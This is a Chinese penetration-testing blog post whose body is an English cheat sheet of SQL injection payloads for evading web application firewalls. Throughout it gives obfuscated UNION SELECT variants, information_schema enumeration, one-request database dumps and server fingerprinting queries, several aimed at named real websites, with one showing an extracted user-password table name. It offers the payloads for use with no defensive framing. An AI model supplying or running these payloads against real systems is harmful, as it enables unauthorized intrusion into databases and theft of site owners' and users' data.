一些bypass语句


Jun 17 2018

一些bypass语句

首页 » 渗透测试 » 一些bypass语句   

AF evasion methods for sql Injections 

I want to share WAF evasion methods for sql Injections. Most are old but few are newer. You can bypass most of the "404 forbidden" and "NOT Acceptable" errors by these methods.

1) id=1+UnIoN+SeLecT 1,2,3 --+

2) id=1+UnIOn/**/SeLect 1,2,3 --+

3) id=1+UNIunionON+SELselectECT 1,2,3 --+

4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3 --+

5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3 --+

6) id=1+%23hihihi%0aUnIOn%23hihihi%0aSeLecT+1,2 ,3 --+

7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3 --+

8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3 --+

/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+ 

9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+

div + 0
Having +1 = 0
AND+ 1 = 0
/*!and*/ +1 = 0
and( 1 )=(0 ) x
OR false the url query
id =- 1 union all select
id =null union all select
id =1 +and+ false + union +all +select
id = 9999 union all select

+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//

http : //www.phm.ie/project.php?cat=Conservation'
 +and(1)=(0) +union+distinct+select+ 1
and use: and 1=0 to apear column number in the page
or
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0‏)

Hard WAF bypass tips
Whitespaces :
union(select(0),version(),(0),(0),(0),(0),(0),(0),
(0))
%0Aunion%0Aselect%0A1,2,3--
/**/union/**/select/**/1,2,3--
like ::
PHP Code:
http ://www.goavenues.com/
list_itinerary.php?id=-4%20union
%20%28select%201,2,version
%28%29,4,5,6,7,8%29%20--
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
NICE QUERY
www.zerocoolhf.altervista.org/level2.php?id=-1'union+select*from(select+1)a+join(select'%3Cfont+color=red+font+face=vardana%3EMr_7un47!5%3C/font%3E')b+join+(select+version())c--+

www.zerocoolhf.altervista.org/level1.php?id=-1'%0AUunioNIOn%0AsELeCT%0A1,VERSION(),3%23
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Bypassing ::
(Double Keyword): UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni<on all sel<ect
%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
/*!20000%0d%0aunion*/+/*!20000%0d
%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f
%252a*/
+%23sexsexsex%0AUnIOn%23sexsexsex
%0ASeLecT+
id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
like ::
PHP Code:
http ://www.goavenues.com/
list_itinerary.php?id=-4%20union
%23aa%0Aselect%201,2,version
%28%29,4,5,6,7,8%20--
PHP Code:
http ://www.goavenues.com/
list_itinerary.php?id=-4%20/**/
union/*!50000select*/
%201,2,version
%28%29,4,5,6,7,8%20--
PHP Code:
http ://www.goavenues.com/
list_itinerary.php?id=-4%20/*!
20000%0d%0aunion*/+/*!20000%0d
%0aSelEct*/%201,2,version
%28%29,4,5,6,7,8%20--
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
after id no. like id=1 +/*!and*/+1=0
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
false the url query :
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
id= - 1 union all select
id= null union all select
id=1 +and+false+ union+all+select
id= 9999 union all select
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Order Bypassing do like this
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
/*!table_name*/
+from /*!information_schema*/./*!tables*/ where
table_schema=database()
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
unhex(hex(Concat
(Column_Name,0x3e,Table_schema,0x3e,table_
Name)))
/*!from*/information_schema.columns/*!where*/
column_name%20/*!like*/char(37,%20112,%2097,
%20115,%20115,%2037)
like ::
PHP Code:
http ://www.westbury.com/
article.php?
article_id=-117%20union%20select
%201,2,unhex%28hex%28Concat
%28Column_Name,0x3e,Table_
schema, 0x3e,table_Name
%29%29%29,4,5,6,7/*!from*/
information_schema.columns/*!
where*/column_name%20/*!like*/
char%2837,%20112,%2097,%20115,
%20115,%2037%29--
user_passwd>westbur6_website>user_info
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
used with order ::
convert( using ascii) or unhex(hex())
like :
PHP Code:
www. westbury. com/ article. php?
article_id =- 117 union select 1 , 2 ,
convert ( group_concat
(table_name ) using ascii ), 4 , 5 ,6 , 7 +
from +information_schema .tables --
IF'ascii' dosent work? you can try
PHP Code:
ujis
ucs2
tis620
swe7
sjis
macroman
macce
latin7
latin5
latin2
koi8u
koi8r
keybcs2
hp8
geostd8
gbk
gb2132
armscii8
ascii
binary
cp1250
big5
cp1251
cp1256
cp1257
cp850

			------------------------------Best Bypass WAF------------------------------------

[~] order by [~]
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/

[~] UNION select [~]
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+ #?uNiOn + #?sEleCt
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

[~] information_schema.tables [~]
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

[~] concat() [~]
CoNcAt()
concat() 
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))

[~] group_concat() [~]
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)
Group_Concat
group_concat ()
/*!group_concat*/ ()
grOUp_ConCat ( /*!*/ , 0x3e , /*!*/ )
group_concat (, 0x3c62723e )
g % 72oup_c % 6Fncat % 28 % 76% 65rsion
% 28 %29 ,% 22 ~ BlackRose% 22 %29
CoNcAt ()
CONCAT (DISTINCT Version ())
concat (, 0x3a ,)
concat %00 ()
% 00CoNcAt ()
/*!50000cOnCat*/ ( /*!Version()*/ )
/*!50000cOnCat*/
/**//*!12345cOnCat*/ (, 0x3a ,)
concat_ws ()
concat (0x3a ,, 0x3c62723e )
/*!concat_ws(0x3a,)*/
concat_ws ( 0x3a3a3a , version()
CONCAT_WS ( CHAR ( 32, 58, 32 ), version
(),)
REVERSE( tacnoc )
binary (version ())
uncompress (compress ( version()))
aes_decrypt ( aes_encrypt ( version
(), 1), 1 )[/ b ][/ u ][/ size ][/ color ]

[~] after id no. like id=1 +/*!and*/+1=0 [~]
+div+0 
Having+1=0 
+AND+1=0 
+/*!and*/+1=0 
and(1)=(0) 
cp852
cp866
cp932
dec8
euckr
latin1
utf8
trick to appear info inside img tag
PHP Code:
concat( 0x223e3c62723e ,, 0x3c696d
67207372633d22 )
when the column is get into html tag,but its not
always inside img tag.
it could be <a> or </noscript> or anything.
like ::
PHP Code:
http ://fzszy.chinacourt.org/
public/detail.php?
id=-168' union /*!
%53elect*/ concat
(0x223e3c2f613e3c2f74643e,
version
(),0x3c6120687265663d22)--+

[DUMP DB in 1 Request]
PHP Code:
( select (@) from ( select(@:= 0x00 ),
( select (@) from ( information_schema . columns) where ( table_schema >=@) and (@) in (@:= concat
(@, 0x0a , ' [ ' ,table_schema , ' ] >' , table_name , ' > ' , column_name )))) x )
( select(@) from ( select (@:= 0x00 ),
( select (@) from ( table ) where (@) in (@:= concat
(@, 0x0a , column1 , 0x3a , column2 )))) a )

[DUMP DB in 1 Request improve]
PHP Code:
( select(@ x ) from (select (@x := 0x00 ),
( select( 0 ) from
( information_schema . columns) where
( table_schema !
= 0x696e666f726d6174696f6e5f736368656d61 )and
( 0x00 ) in(@ x := concat
(@ x ,0x3c62723e , table_schema , 0x2e , table_name , 0x3a , column_name )))) x )
like
http : //www.marinaplast.com/page.php?
id=-13 union select 1,2,(select
(@x)from(select(@x:=0x00),(select
(0)from(information_schema.colu
mns)where(table_schema!
=0x696e666f726d6174696f6e5f736368656d61)and
(0x00)in(@x:=concat
(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 --

 WHITESPACES BYPASS . 
%09 %0A %0B %0C %0D %A0
get version - DB_NAME - user - HOST_NAME -
datadir
PHP Code:
version()
convert( version() using latin1 )
unhex ( hex( version()))
@@GLOBAL. VERSION
( substr
(@@version ,1 , 1 )=5 ) :: 1 true 0 fals
# like #
www. marinaplast. com/ page . php?
id =- 13 union select 1 , 2 ,( substr
(@@version ,1 , 1 )=5 ), 4, 5 --
1 it 's mean version 5 and 0 mean version 4
+and substring(version(),1,1)=4
+and substring(version(),1,1)=5
+and substring(version(),1,1)=9
+and substring(version(),1,1)=10
# like #
www.marinaplast.com/page.php?
id=13+and substring(version
(),1,1)=5
download good version 5
www.marinaplast.com/page.php?
id=13+and substring(version
(),1,1)=4
not download good version 4
version 5
id=1 /*!50094aaaa*/ error
id=1 /*!50095aaaa*/ no error
id=1 /*!50096aaaa*/ error
# like #
www.marinaplast.com/page.php?id=13 /
*!50095aaaa*/  no error v5
version 4
id=1 /*!40123 1=1*/--+- no error
id=1 /*!40122rrrr*/ no error
# like #
www.marinaplast.com/page.php?id=13 /
*!40122rrrr*/ error not v4
☆¸.•*☆ ☆*•.¸☆
DB_NAME()
@@database
database()
id=vv()
# like #
www.marinaplast.com/page.php?
id=-13 union select 1,2,DB_NAME
(),4,5 --
www.marinaplast.com/page.php?id=vv
()
☆¸.•*☆ ☆*•.¸☆
@@user
user()
user_name()
system_user()
# like #
www.marinaplast.com/page.php?
id=-13 union select 1,2,user
(),4,5 --
☆¸.•*☆ ☆*•.¸☆
HOST_NAME()
@@hostname
@@servername
SERVERPROPERTY()
# like #
www.marinaplast.com/page.php?
id=-13 union select 1,2,HOST_NAME
(),4,5 --
☆¸.•*☆ ☆*•.¸☆
@@datadir
datadir()
# like #
www.marinaplast.com/page.php?
id=-13 union select 1,2,datadir(),4,5 --
☆¸.•*☆ ☆*•.¸☆
ASPX
and 1=0/@@version
' and 1 =0 /@@ version;--
) and 1 =@@version--
and 1 = 0 /user ;--

如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签:这篇文章木有标签

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «CMS漏洞检测和利用套件 | WAF绕过的一些总结和思考»

你肿么看?

你还可以输入 250/250 个字

 微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

这篇文章还没有收到评论,赶紧来抢沙发吧~